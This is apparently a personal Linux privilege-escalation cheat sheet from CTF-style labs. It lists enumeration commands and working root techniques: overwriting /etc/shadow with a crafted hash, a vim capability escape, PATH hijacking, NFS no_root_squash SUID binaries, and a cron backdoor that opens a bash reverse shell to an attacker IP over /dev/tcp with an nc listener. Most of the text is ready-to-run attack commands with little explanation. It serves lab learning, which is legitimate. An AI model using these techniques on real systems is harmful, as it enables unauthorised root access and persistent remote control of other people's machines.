-
sudo -l -
bin/bash -ito get interactive shell -
find / -name local.txt 2> /dev/null -
find -type d -name ".*" 2>/dev/nullit will check hidden directories. -
find / -not -type l -perm -o+w -
find / -perm -u=s -type f 2>/dev/null -
Downloading file from remote ssh
scp admin@10.0.1.22:~/Desktop/id_rsa .
-
If you have permission to write
/etc/shadowuse the below commands- First you need to creat a one hash password using openssl
openssl passwd -1 -salt abc password123it will give you a hash$1$abc$DSFILJKSD7393llsd.0s/copy that- Edit the root password
root:$1$abc$DSFILJKSD7393llsd.0s/:1772:0:99999:7:::
- First you need to creat a one hash password using openssl
-
1.
cat /etc/shellsCheck which shells are available in the target system -
2. Check for
python --versionto know python is installed or notpython -c 'import pty; pty.spawn("/bin/bash")'
-
3. Check for
perl --helpinstalled or not- perl -e 'exec "bin/bash";'
- perl: exec "/bin/bash";
-
4. ruby: exec "bin/bash"
-
Important
envexport PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binexport TERM=xtermexport SHELL=bash
Syntax: find <path> <options> <regex/name>
find . -name flag1.txt: find the file named “flag1.txt” in the current directory
find /home -name flag1.txt : find the file names “flag1.txt” in the /home directory
find / -type d -name config : find the directory named config under “/”
find / -type f -perm 0777` : find files with the 777 permissions (files readable, writable, and executable by all users)
find / -perm a=x : find executable files
find /home -user frank : find all files for user “frank” under “/home”
find / -mtime 10 : find files that were modified in the last 10 days
find / -atime 10 : find files that were accessed in the last 10 day
find / -cmin -60 : find files changed within the last hour (60 minutes)
find / -amin -60 : find files accesses within the last hour (60 minutes)
find / -size 50M : find files with a 50 MB size
find / -writable -type d 2>/dev/null : Find world-writeable folders
find / -perm -222 -type d 2>/dev/null : Find world-writeable folders
find / -perm -o w -type d 2>/dev/null : Find world-writeable folders
find / -perm -o x -type d 2>/dev/null : Find world-executable folders
We can also find programming languages and supported languages: find / -name perl*, find / -name python*, find / -name gcc* ...etc
find / -perm -u=s -type f 2>/dev/null : Find files with the SUID bit, which allows us to run the file with a higher privilege level than the current user. This is important!
- Here we're going to see few commands which help us in enumerating target system
hostname- lists the name of the hostuname -a- prints kernel informationcat /proc/version- prints almost same infor of above command but more like gcc version....cat /etc/issue- exact version on the OSps- lists the processes that are runningps -A- all running processesps axjf- process treeps aux- displays processes with the users as well
env- shows all the environment variablesudo -l- lists the commands that any user run as root without passwordgroups- lists the groups that current user is inid- lists id of group,usercat /etc/passwd- displays all the usercat /etc/passwd | cut -d ":" -f 1- removes other stuff & only displays usersls /home- displays users
history- previously ran commands which might have some sensitive infoifconfig(or)ip a(or)ip route- network related information- netstat - network route
netstat -a- all listening and established connectionnetstat -at- tcp connectionsnetstat -au- udp connectionsnetstat -l- listening connectionsnetstat -s- network statisticsnetstat -tp- connections with service name and pid we can also add "l" for only listening portsnetstat -i- interface related informationnetstat -ano
hostnamecat /etc/issueorcat/etc/*releaseunmae -adisplay hostname, kernal versionenvlscpufree -hdf -hDisplay the storage diversdf -ht ext4lsblk | grep sddpkg -ldisplay the installed packagesadduser -m royal /bin/bashgroupsgroups bobusermod -aG root boblastlog
whoamiDisplay the name of current usergroups <user>to chech the user to which group user is belongs to- __
cat /etc/passwddisplay other users on the linux system __-
It will display both service account and user account
- For user account it will be /bin/bash or /bin/sh for the born shell
- For service account it will be /usr/sbin/nologin
cat /etc/passwd | grep -v /nologindisplay only user account
-
root:x:0:0:root:/root:/bin/bash
| | |
| | |
| | |
| | group id
| user id
user name
useradd -m bob -s /bin/bashcreating a usergroupsdisplay the groupsgroups bobchecking the user to which group belongs tousermod -aG root bobAdd the bob user to the root grouplastit will display only last user loggedlastlogit will display the history of logged user
- Its a kind of permission which gives specific permissions to run a file as root/owner
- This is really helpful to test. find / -perm -u=s -type f 2>/dev/null` this will list all the suid files
- Capabilities are a bit similar to the SUID
- Capabilities provide a subset of root privileges to a process or a binary
- In order to look for them use
getcap -r / 2>/dev/null - Find the binary and check that on GTFOBins where there's a function for Capabilities and try out those any of them will work!
- In the example they provided a capability for
vimand I used./vim -c ':py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'which is provided in the website itself and I got root! - Remember that this process is hit or trail, if it doesnt work move on!
- Crons jobs are used for scheduling! Here we can schedule any binary/process to run.
- Interesting part here is that by default they run with the owner privileges.
- Any one can view it!
- To view crontab,
cat /etc/crontab cat /etc/cron*echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/<attacker_ip>/1234 0>&1'" > backdoorcrontab -i backdoorcrontab -l
nc -nlvp 1234
- PATH is an environment variable
- In order to run any binary we need to specify the full path also, but if the address of file is specified in PATH variable then we can simpley run the binary by mentioning its name, like how we run some command line tools like ls, cd,....etc
- In order to view the content in PATH variable we need to run
echo $PATHand the outpur will be something like thisusr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin - So whenever you use a tool without specifying path it searches in PATH and it runs!
- We can even add new path to PATH variable by
export PATH=<new-path>:$PATH - Also we need to find a writable paths so run
find / -writable 2>/dev/null - In the example I found a location where there's a script when I run its showing that "thm" not found, also it can be run as ROOT
- So I created a binary like
echo "/bin/bash" > thmand gave executable rights then later added the path where thm located to PATH variable and now when I ran the binary then I got root!
- In order to view the configuration of NFS run
cat /etc/exportsor also we can typeshowmount -e <target IP>on our machine to find the mountable shares. - In the output look for directories having
no_root_squash, this means that the particular share is writable, hence we can do something to acquires root! - Now after getting some directories where we can play around lets navigate to our attacker machine and create a sample directory anywhere like
/tmp...etc - Now we need to mount to the target machine by,
mount -o rw <targetIP>:<share-location> <directory path we created>, hererwmeans read, write privileges. - Now go to the folder we created and create a binary which gives us root on running.
- Then go back to the target machine and we can view the binary we created in the place we mounted, now run that and get root privileges!(do note that giving executable rights is not sufficient, we also need to give share rights by
chmod +s <binary>) - Then we're good to go!